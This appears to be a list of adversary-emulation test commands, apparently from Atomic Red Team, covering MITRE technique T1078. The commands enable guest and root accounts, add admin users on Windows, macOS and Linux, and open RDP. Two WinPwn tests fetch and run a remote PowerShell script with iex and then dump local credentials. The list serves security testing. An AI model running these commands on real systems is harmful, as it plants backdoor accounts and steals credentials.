1078.001
Enable Guest account with RDP capability and admin privileges
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Activate Guest Account
net user #{guest_user} /active:yes
Enable Guest Account on macOS
sudo sysadminctl -guestAccount on
1078.003
Atomic Test #2 - Create local account with admin privileges - MacOS
Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS
Atomic Test #4 - Enable root account using dsenableroot utility - MacOS
Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS
Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie
Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz
Atomic Test #9 - Reactivate a locked/expired account (Linux)
Create local account with admin privileges
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
Create local account with admin privileges - MacOS
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
Create local account with admin privileges using sysadminctl utility - MacOS
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
Enable root account using dsenableroot utility - MacOS
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
Add a new/existing user to the admin group using dseditgroup utility - macOS
dseditgroup -o edit -a art-user -t user admin
WinPwn - Loot local Credentials - powerhell kittie
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
WinPwn - Loot local Credentials - Safetykatz
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
Create local account (Linux)
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
su art
whoami
exit
Reactivate a locked/expired account (Linux)
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su art
whoami
exit
Login as nobody (Linux)
cat /etc/passwd |grep nobody
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su nobody
whoami
exit